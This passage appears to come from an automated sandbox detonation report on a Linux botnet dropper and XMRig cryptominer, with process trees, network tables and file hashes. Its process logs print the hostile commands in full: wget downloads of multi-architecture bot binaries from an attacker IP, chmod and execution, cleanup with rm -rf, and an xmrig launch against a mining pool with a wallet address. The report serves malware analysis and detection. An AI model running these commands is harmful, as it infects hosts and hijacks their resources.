[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]
Network
| Country | Destination | Domain | Proto |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | tcp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | tcp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | tcp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| US | 1.1.1.1:53 | github.com | udp |
Files
/tmp/bots
| MD5 | 2615e32f9e7b42b36ba1f3dd6f8f7e3c |
| SHA1 | 4286d999a1a76da1e68cb227e01de237ef5fcf68 |
| SHA256 | e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078 |
| SHA512 | b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 04:09
Reported
2024-11-09 04:11
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
95s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/bots | /tmp/bots | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.mips | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.mips | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/tyo2831qq.mips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tyo2831qq.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bots | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm7 | /usr/bin/wget | N/A |
Processes
/tmp/tyo2831qq.sh
[/tmp/tyo2831qq.sh]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mips]
/bin/chmod
[chmod 777 tyo2831qq.mips]
/tmp/tyo2831qq.mips
[./tyo2831qq.mips]
/usr/bin/wget
[wget http://31.172.80.237/bots]
/bin/chmod
[chmod 777 bots]
/tmp/bots
[./bots]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mpsl]
/bin/chmod
[chmod 777 tyo2831qq.mpsl]
/tmp/tyo2831qq.mpsl
[./tyo2831qq.mpsl]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.sh4]
/bin/chmod
[chmod 777 tyo2831qq.sh4]
/tmp/tyo2831qq.sh4
[./tyo2831qq.sh4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x86]
/bin/chmod
[chmod 777 tyo2831qq.x86]
/tmp/tyo2831qq.x86
[./tyo2831qq.x86]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm6]
/bin/chmod
[chmod 777 tyo2831qq.arm6]
/tmp/tyo2831qq.arm6
[./tyo2831qq.arm6]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x32]
/bin/chmod
[chmod 777 tyo2831qq.x32]
/tmp/tyo2831qq.x32
[./tyo2831qq.x32]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.ppc]
/bin/chmod
[chmod 777 tyo2831qq.ppc]
/tmp/tyo2831qq.ppc
[./tyo2831qq.ppc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.i586]
/bin/chmod
[chmod 777 tyo2831qq.i586]
/tmp/tyo2831qq.i586
[./tyo2831qq.i586]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.m68k]
/bin/chmod
[chmod 777 tyo2831qq.m68k]
/tmp/tyo2831qq.m68k
[./tyo2831qq.m68k]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.spc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm7]
/bin/chmod
[chmod 777 tyo2831qq.arm7]
/tmp/tyo2831qq.arm7
[./tyo2831qq.arm7]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm5]
/bin/rm
[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]
/usr/bin/wget
[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]
/bin/chmod
[chmod 777 xmrig]
/tmp/xmrig
[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]
Network
| Country | Destination | Domain | Proto |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | tcp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
/tmp/bots
| MD5 | 2615e32f9e7b42b36ba1f3dd6f8f7e3c |
| SHA1 | 4286d999a1a76da1e68cb227e01de237ef5fcf68 |
| SHA256 | e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078 |
| SHA512 | b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 04:09
Reported
2024-11-09 04:11
Platform
debian9-mipsel-20240418-en
Max time kernel
95s
Max time network
96s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Xmrig_linux family
xmrig
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/bots | /tmp/bots | N/A |
| N/A | /tmp/xmrig | /tmp/xmrig | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.mpsl | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/tyo2831qq.mpsl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/tyo2831qq.mips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/bots | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x32 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.i586 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tyo2831qq.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/xmrig | /usr/bin/wget | N/A |
Processes
/tmp/tyo2831qq.sh
[/tmp/tyo2831qq.sh]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mips]
/bin/chmod
[chmod 777 tyo2831qq.mips]
/tmp/tyo2831qq.mips
[./tyo2831qq.mips]
/usr/bin/wget
[wget http://31.172.80.237/bots]
/bin/chmod
[chmod 777 bots]
/tmp/bots
[./bots]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.mpsl]
/bin/chmod
[chmod 777 tyo2831qq.mpsl]
/tmp/tyo2831qq.mpsl
[./tyo2831qq.mpsl]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.sh4]
/bin/chmod
[chmod 777 tyo2831qq.sh4]
/tmp/tyo2831qq.sh4
[./tyo2831qq.sh4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x86]
/bin/chmod
[chmod 777 tyo2831qq.x86]
/tmp/tyo2831qq.x86
[./tyo2831qq.x86]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm6]
/bin/chmod
[chmod 777 tyo2831qq.arm6]
/tmp/tyo2831qq.arm6
[./tyo2831qq.arm6]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.x32]
/bin/chmod
[chmod 777 tyo2831qq.x32]
/tmp/tyo2831qq.x32
[./tyo2831qq.x32]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.ppc]
/bin/chmod
[chmod 777 tyo2831qq.ppc]
/tmp/tyo2831qq.ppc
[./tyo2831qq.ppc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.i586]
/bin/chmod
[chmod 777 tyo2831qq.i586]
/tmp/tyo2831qq.i586
[./tyo2831qq.i586]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.m68k]
/bin/chmod
[chmod 777 tyo2831qq.m68k]
/tmp/tyo2831qq.m68k
[./tyo2831qq.m68k]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.spc]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm4]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm7]
/bin/chmod
[chmod 777 tyo2831qq.arm7]
/tmp/tyo2831qq.arm7
[./tyo2831qq.arm7]
/usr/bin/wget
[wget http://31.172.80.237/tyo2831qq.arm5]
/bin/rm
[rm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x86]
/usr/bin/wget
[wget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig]
/bin/chmod
[chmod 777 xmrig]
/tmp/xmrig
[./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B]
Network
| Country | Destination | Domain | Proto |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:706 | tcp | |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| DE | 31.172.80.237:80 | 31.172.80.237 | tcp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 1.1.1.1:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
Files
/tmp/bots
| MD5 | 2615e32f9e7b42b36ba1f3dd6f8f7e3c |
| SHA1 | 4286d999a1a76da1e68cb227e01de237ef5fcf68 |
| SHA256 | e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078 |
| SHA512 | b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78 |
/tmp/xmrig
| MD5 | 49fde861072798623bf35de4794f7d3d |
| SHA1 | 1c9b225d3e34db9c2a0fecb9f2c254da1371f953 |
| SHA256 | 8268144d8232fc0dae86c2536eef50916e4ee9a23b15a561aa72971714359383 |
| SHA512 | 14393a6a7f9103340338e74457c6f95eb7180d2a90b87e01945be621a0d0798c05fdfb08ec3dbc2ca61ee2cbb6299b48e8b27c01b00913b5e5e9ed704318ac22 |
/root/.wget-hsts
| MD5 | 5e330d55bb520266447b86c2c47fdc0f |
| SHA1 | 28e862fa757fba4f7dca7fbeac6433b1bdf75ca7 |
| SHA256 | ea7045dc1e2dd6c47941880d671c5ba8536a20728965c362881e7fee0fb3d1b2 |
| SHA512 | 8232b08e80b64a8fe7b46140e9ad7a170a06a66e59a6f728b9fda80531033d2ebe0fe68c0dde05a0e832d96c8817678e1ae27a8729a7e6d0c23ad06c8b9a6262 |